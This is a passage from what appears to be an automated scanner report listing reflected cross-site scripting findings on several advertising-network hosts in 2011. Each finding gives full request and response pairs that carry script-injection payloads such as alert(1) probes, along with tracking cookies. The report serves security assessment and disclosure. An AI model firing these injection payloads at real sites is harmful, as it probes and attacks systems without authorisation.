GET /admeld/match?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=78&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match23569'%3balert(1)//b87386ea441 HTTP/1.1
Host: admeld-match.dotomi.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?01AD=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA&01RI=90A4C54ACA8290D&01NA=&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 11 Apr 2011 16:21:26 GMT
X-Name: rtb-o03
Cache-Control: max-age=0, no-store
Content-Type: text/javascript
Connection: close
Content-Length: 160

document.write('<img src="http://tag.admeld.com/match23569';alert(1)//b87386ea441?admeld_adprovider_id=78&external_user_id=0&expiration=1302798086" alt="" />');
1.24. http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ccf36'-alert(1)-'517d783341 was submitted in the admeld_adprovider_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /usersync?calltype=admeld&admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=193ccf36'-alert(1)-'517d783341&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnewsrtb/728x90/ros?t=1302538875852&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid2=8663496762294337265; anj=Kfu=8fG4S]fQCe7?0P(*AuB-u**g1:XIF3ZUMbNTk^i4(0yHan$WRZ?dsg4U!.GQv!b=rS4vsHr#5hLUHfpwcPki/)#5j#QOVB/1X?`d/Lh<E'Cm2t/WTA]'`kG3]ocdCcrW'<%^Ue4vP!!5ch.vajEL)BV[>#vXU'Dqt8H!mBfnMp/NHg8A3Ndz!g8cZwEc(wVe4[.3A2tr=lb)p#*Xc02Og?@'f9fL9.O3]'UWJ-No-vqc^97BbwdN:A>`PTQ'knJh9yhU$

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 12-Apr-2011 16:21:47 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=8663496762294337265; path=/; expires=Sun, 10-Jul-2011 16:21:47 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Mon, 11 Apr 2011 16:21:47 GMT
Content-Length: 182

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=193ccf36'-alert(1)-'517d783341&external_user_id=8663496762294337265&expiration=0" width="0" height="0"/>');
1.25. http://admeld.adnxs.com/usersync [admeld_callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e0bd2'-alert(1)-'82d72219828 was submitted in the admeld_callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /usersync?calltype=admeld&admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/matche0bd2'-alert(1)-'82d72219828 HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnewsrtb/728x90/ros?t=1302538875852&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid2=8663496762294337265; anj=Kfu=8fG4S]fQCe7?0P(*AuB-u**g1:XIF3ZUMbNTk^i4(0yHan$WRZ?dsg4U!.GQv!b=rS4vsHr#5hLUHfpwcPki/)#5j#QOVB/1X?`d/Lh<E'Cm2t/WTA]'`kG3]ocdCcrW'<%^Ue4vP!!5ch.vajEL)BV[>#vXU'Dqt8H!mBfnMp/NHg8A3Ndz!g8cZwEc(wVe4[.3A2tr=lb)p#*Xc02Og?@'f9fL9.O3]'UWJ-No-vqc^97BbwdN:A>`PTQ'knJh9yhU$

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 12-Apr-2011 16:21:51 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=8663496762294337265; path=/; expires=Sun, 10-Jul-2011 16:21:51 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Mon, 11 Apr 2011 16:21:51 GMT
Content-Length: 183

document.write('<img src="http://tag.admeld.com/matche0bd2'-alert(1)-'82d72219828?admeld_adprovider_id=193&external_user_id=8663496762294337265&expiration=0" width="0" height="0"/>');
1.26. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_adprovider_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.lucidmedia.com
Path:   /clicksense/admeld/match

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db13b'%3balert(1)//7d749869842 was submitted in the admeld_adprovider_id parameter. This input was echoed as db13b';alert(1)//7d749869842 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /clicksense/admeld/match?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=73db13b'%3balert(1)//7d749869842&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.lucidmedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/ros?t=1302539475029&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain
Date: Mon, 11 Apr 2011 16:31:37 GMT
Expires: Mon, 11 Apr 2011 16:31:38 GMT
P3P: CP=NOI ADM DEV CUR
Server: Apache-Coyote/1.1
Set-Cookie: 2=2x5NrHbDfMO; Domain=.lucidmedia.com; Expires=Tue, 10-Apr-2012 16:31:38 GMT; Path=/
Content-Length: 192
Connection: keep-alive

document.write('<img height="0" width="0" style="display: none;" src="http://tag.admeld.com/match?admeld_adprovider_id=73db13b';alert(1)//7d749869842&external_user_id=3406242444969162266"/>');
1.27. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.lucidmedia.com
Path:   /clicksense/admeld/match

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2bef0'%3balert(1)//20f199ae318 was submitted in the admeld_callback parameter. This input was echoed as 2bef0';alert(1)//20f199ae318 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /clicksense/admeld/match?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=73&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match2bef0'%3balert(1)//20f199ae318 HTTP/1.1
Host: admeld.lucidmedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/ros?t=1302539475029&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain
Date: Mon, 11 Apr 2011 16:31:39 GMT
Expires: Mon, 11 Apr 2011 16:31:40 GMT
P3P: CP=NOI ADM DEV CUR
Server: Apache-Coyote/1.1
Set-Cookie: 2=2x5NrivaYDr; Domain=.lucidmedia.com; Expires=Tue, 10-Apr-2012 16:31:40 GMT; Path=/
Content-Length: 192
Connection: keep-alive

document.write('<img height="0" width="0" style="display: none;" src="http://tag.admeld.com/match2bef0';alert(1)//20f199ae318?admeld_adprovider_id=73&external_user_id=3406242474301735927"/>');
1.28. http://ads.adap.tv/beacons [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adap.tv
Path:   /beacons

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload ab9b5<script>alert(1)</script>384174b4e4a was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacons?callback=jsonp1302352256751ab9b5<script>alert(1)</script>384174b4e4a HTTP/1.1
Host: ads.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="-1808697827335733967__TIME__2011-04-09+05%3A31%3A05";Path=/;Domain=.adap.tv;Expires=Tue, 16-Dec-42 14:17:45 GMT
Content-Type: text/plain; charset=iso-8859-1
Server: Jetty(6.1.22)
Content-Length: 620

jsonp1302352256751ab9b5<script>alert(1)</script>384174b4e4a({
   "beacons":["http://tags.bluekai.com/site/2174", "http://load.exelator.com/load/?p=104&g=080&j=0&u=1234567&site=2222", "http://pixel.quantserve.com/seg/r;a=p-573scDfDoUH6o;redirect=http://segments.a
...[SNIP]...
1.29. http://ads.adbrite.com/adserver/vdi/682865 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/682865

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 257af<script>alert(1)</script>adaed44508d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/682865257af<script>alert(1)</script>adaed44508d?d=null&r=http%3A%2F%2Fuser.lucidmedia.com%2Fclicksense%2Fuser%3Fp%3D88436487f575811a%26r%3D0%26i%3D HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; srh="1%3Aq64FAA%3D%3D"; rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Adqjd"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMLFicapSQCBdIKjLNAAjWGpfkGSjpKSYl5ealFmWDTlGprAQ%3D%3D"; vsd=0@1@4da0529f@www.wcax.com; fq="7xiqt%2C1uo0%7Cljdxnj"

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Sat, 09 Apr 2011 12:36:44 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/682865257af<script>alert(1)</script>adaed44508d
1.30. http://ads.adbrite.com/adserver/vdi/682865 [r parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/682865

Issue detail

The value of the r request parameter is copied into the HTML document as plain text between tags. The payload 41e2c<script>alert(1)</script>c765e6e8b07 was submitted in the r parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /adserver/vdi/682865?d=null&r=41e2c<script>alert(1)</script>c765e6e8b07 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; srh="1%3Aq64FAA%3D%3D"; rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Adqjd"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMLFicapSQCBdIKjLNAAjWGpfkGSjpKSYl5ealFmWDTlGprAQ%3D%3D"; vsd=0@1@4da0529f@www.wcax.com; fq="7xiqt%2C1uo0%7Cljdxnj"

Response (redirected)

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Sat, 09 Apr 2011 12:36:42 GMT
Server: XPEHb/1.0
Content-Length: 123

Unsupported URL: /adserver/vdi/41e2c<script>alert(1)</script>c765e6e8b07MTY4MzYyMDQ2eDAuNzQzIDEzMDE3ODY2MDV4LTExODAzODE1MDI
1.31. http://ads.adbrite.com/adserver/vdi/684339 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/684339

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload cd6ca<script>alert(1)</script>eb33f605576 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/684339cd6ca<script>alert(1)</script>eb33f605576?d=uuid%3D4d97b063-cd55-fcc9-f79b-3dc3c331fd5b HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; srh="1%3Aq64FAA%3D%3D"; rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Adqjd"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMLFicapSQCBdIKjLNAAjWGpfkGSjpKSYl5ealFmWDTlGprAQ%3D%3D"; vsd=0@1@4da0529f@www.wcax.com; fq="7xiqt%2C1uo0%7Cljdxnj"

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Sat, 09 Apr 2011 12:36:41 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/684339cd6ca<script>alert(1)</script>eb33f605576
1.32. http://ads.adbrite.com/adserver/vdi/712156 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/712156

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 519ae<script>alert(1)</script>90d04b9f705 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/712156519ae<script>alert(1)</script>90d04b9f705?d=1iolb30nur9ak HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh38.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMJKukoJSXm5aUWZYL1KdXWAgA%3D"; vsd=0@1@4d9d6e04@cti.w55c.net; rb=0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Sat, 09 Apr 2011 00:22:33 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/712156519ae<script>alert(1)</script>90d04b9f705
1.33. http://ads.adbrite.com/adserver/vdi/742697 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/742697

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 43f7e<script>alert(1)</script>2c8a8d39513 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/74269743f7e<script>alert(1)</script>2c8a8d39513?d=4608069584519221037 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4608069584519221037&mktid=&mpid=&fpid=-1&rnd=7441790688687410964&nu=n&sp=n
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Adqjd"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMLFicapSQCBdIKjLNAAjWGpfkGSjpKSYl5ealFmWDTlGprAQ%3D%3D"; fq="7xiqt%2C1uo0%7Cljdxnj%7Cljdxnp%2C86fx4%2C1uo0%7Cljdxno"; rb=0:682865:20838240:null:0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:762701:20861280:E3F32BD012B0974D052B68A20247663B:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Mon, 11 Apr 2011 16:41:56 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/74269743f7e<script>alert(1)</script>2c8a8d39513
1.34. http://ads.adbrite.com/adserver/vdi/762701 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/762701

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ac400<script>alert(1)</script>54595068153 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/762701ac400<script>alert(1)</script>54595068153?d=E3F32BD012B0974D052B68A20247663B HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; srh="1%3Aq64FAA%3D%3D"; rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Adqjd"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMLFicapSQCBdIKjLNAAjWGpfkGSjpKSYl5ealFmWDTlGprAQ%3D%3D"; vsd=0@1@4da0529f@www.wcax.com; fq="7xiqt%2C1uo0%7Cljdxnj"

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Sat, 09 Apr 2011 12:36:30 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/762701ac400<script>alert(1)</script>54595068153
1.35. http://ads.adbrite.com/adserver/vdi/779045 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/779045

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 54e24<script>alert(1)</script>80b200b4843 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/77904554e24<script>alert(1)</script>80b200b4843?d=37820808542507095 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; srh="1%3Aq64FAA%3D%3D"; rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Adqjd"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMLFicapSQCBdIKjLNAAjWGpfkGSjpKSYl5ealFmWDTlGprAQ%3D%3D"; vsd=0@1@4da0529f@www.wcax.com; fq="7xiqt%2C1uo0%7Cljdxnj"

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Sat, 09 Apr 2011 12:36:39 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/77904554e24<script>alert(1)</script>80b200b4843
1.36. http://ads.adsonar.com/adserving/getAds.jsp [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload 71675<script>alert(1)</script>d3c41350c71 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

